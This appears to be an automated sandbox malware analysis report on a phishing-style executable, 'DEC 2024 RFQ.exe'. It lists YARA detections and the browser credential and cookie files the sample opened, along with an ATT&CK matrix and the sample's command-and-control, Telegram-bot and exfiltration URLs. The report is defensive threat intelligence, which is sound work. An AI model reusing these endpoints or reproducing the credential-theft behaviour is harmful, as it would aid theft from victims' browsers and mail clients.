                  Source: DEC 2024 RFQ.exe, 00000000.00000003.1666453279.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664147145.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664322405.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666971979.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1665224245.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666649288.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664422494.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664676808.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1665689565.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666154606.0000000001750000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procmon.exe

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                  Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: DEC 2024 RFQ.exe | Binary or memory string: WIN_81
                  Source: DEC 2024 RFQ.exe | Binary or memory string: WIN_XP
                  Source: DEC 2024 RFQ.exe | Binary or memory string: WIN_XPe
                  Source: DEC 2024 RFQ.exe | Binary or memory string: WIN_VISTA
                  Source: DEC 2024 RFQ.exe | Binary or memory string: WIN_7
                  Source: DEC 2024 RFQ.exe | Binary or memory string: WIN_8
                  Source: DEC 2024 RFQ.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                  Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00096283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00096283
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00096747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00096747
                  MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the count of matched signatures for that technique)

                  Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
                  Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
                  Initial Access: 2 Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
                  Execution: 12 Native API, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
                  Persistence: 1 DLL Side-Loading, 2 Valid Accounts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
                  Privilege Escalation: 1 Exploitation for Privilege Escalation, 1 DLL Side-Loading, 2 Valid Accounts, 21 Access Token Manipulation, 212 Process Injection, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
                  Defense Evasion: 11 Disable or Modify Tools, 11 Deobfuscate/Decode Files or Information, 3 Obfuscated Files or Information, 1 DLL Side-Loading, 2 Valid Accounts, 11 Virtualization/Sandbox Evasion, 21 Access Token Manipulation, 212 Process Injection, HTML Smuggling, Dynamic API Resolution
                  Credential Access: 1 OS Credential Dumping, 121 Input Capture, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
                  Discovery: 2 System Time Discovery, 1 Account Discovery, 1 File and Directory Discovery, 127 System Information Discovery, 241 Security Software Discovery, 11 Virtualization/Sandbox Evasion, 2 Process Discovery, 11 Application Window Discovery, 1 System Owner/User Discovery, 1 System Network Configuration Discovery
                  Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
                  Collection: 11 Archive Collected Data, 1 Data from Local System, 1 Screen Capture, 1 Email Collection, 121 Input Capture, 3 Clipboard Data, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
                  Command and Control: 1 Web Service, 4 Ingress Tool Transfer, 11 Encrypted Channel, 3 Non-Application Layer Protocol, 14 Application Layer Protocol, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
                  Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                  Impact: 1 System Shutdown/Reboot, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement
                  Source | Detection | Scanner | Label | Link
                  DEC 2024 RFQ.exe | 39% | ReversingLabs | Win32.Trojan.AutoitInject |
                  DEC 2024 RFQ.exe | 100% | Joe Sandbox ML | |
                  No Antivirus matches
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  reallyfreegeoip.org | 104.21.67.152 | true | false | | high
                  api.telegram.org | 149.154.167.220 | true | false | | high
                  checkip.dyndns.com | 132.226.247.73 | true | false | | high
                  checkip.dyndns.org | unknown | unknown | false | | high
                  Name | Malicious | Antivirus Detection | Reputation
                  https://reallyfreegeoip.org/xml/8.46.123.175 | false | | high
                  http://checkip.dyndns.org/ | false | | high
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2012/12/2024%20/%2005:31:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  https://www.office.com/ | RegSvcs.exe, 00000001.00000002.4150184054.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://api.telegram.org | RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://api.telegram.org/bot | DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://www.office.com/lB | RegSvcs.exe, 00000001.00000002.4150184054.0000000002E1F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a | RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://checkip.dyndns.org | RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | RegSvcs.exe, 00000001.00000002.4151891799.0000000003FD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003EB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D11000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | RegSvcs.exe, 00000001.00000002.4151891799.0000000003FD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003EB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D11000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000001.00000002.4150184054.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://varders.kozow.com:8081 | DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://aborters.duckdns.org:8081 | DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://reallyfreegeoip.org/xml/8.46.123.175$ | RegSvcs.exe, 00000001.00000002.4150184054.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://anotherarmy.dns.army:8081 | DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | RegSvcs.exe, 00000001.00000002.4151891799.0000000003EBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003FB3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003E90000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  http://checkip.dyndns.org/q | DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
                  https://chrome.google.com/webstore?hl=enlB | RegSvcs.exe, 00000001.00000002.4150184054.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://reallyfreegeoip.org | RegSvcs.exe, 00000001.00000002.4150184054.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | false | | high
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | RegSvcs.exe, 00000001.00000002.4151891799.0000000003EBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003FB3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003E90000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedDEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://reallyfreegeoip.org/xml/DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572918
Start date and time: 2024-12-11 08:58:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DEC 2024 RFQ.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/4@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 58
• Number of non-executed functions: 279
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• VT rate limit hit for: DEC 2024 RFQ.exe
Time | Type | Description
02:59:04 | API Interceptor | 9710808x Sleep call for process: RegSvcs.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            149.154.167.220Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                              https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                104.21.67.152Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                            Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  Request for Quotation_10.12.2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    132.226.247.73Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    10122024Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    document.pif.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    checkip.dyndns.comfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 132.226.8.169
                                                                                                                    Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    Malzeme #U0130stek Formu_12102024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 193.122.130.0
                                                                                                                    Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 132.226.8.169
                                                                                                                    REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    • 132.226.8.169
                                                                                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 193.122.130.0
                                                                                                                    New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    reallyfreegeoip.orgfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 188.114.97.6
                                                                                                                    REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • 188.114.96.6
                                                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 104.21.67.152
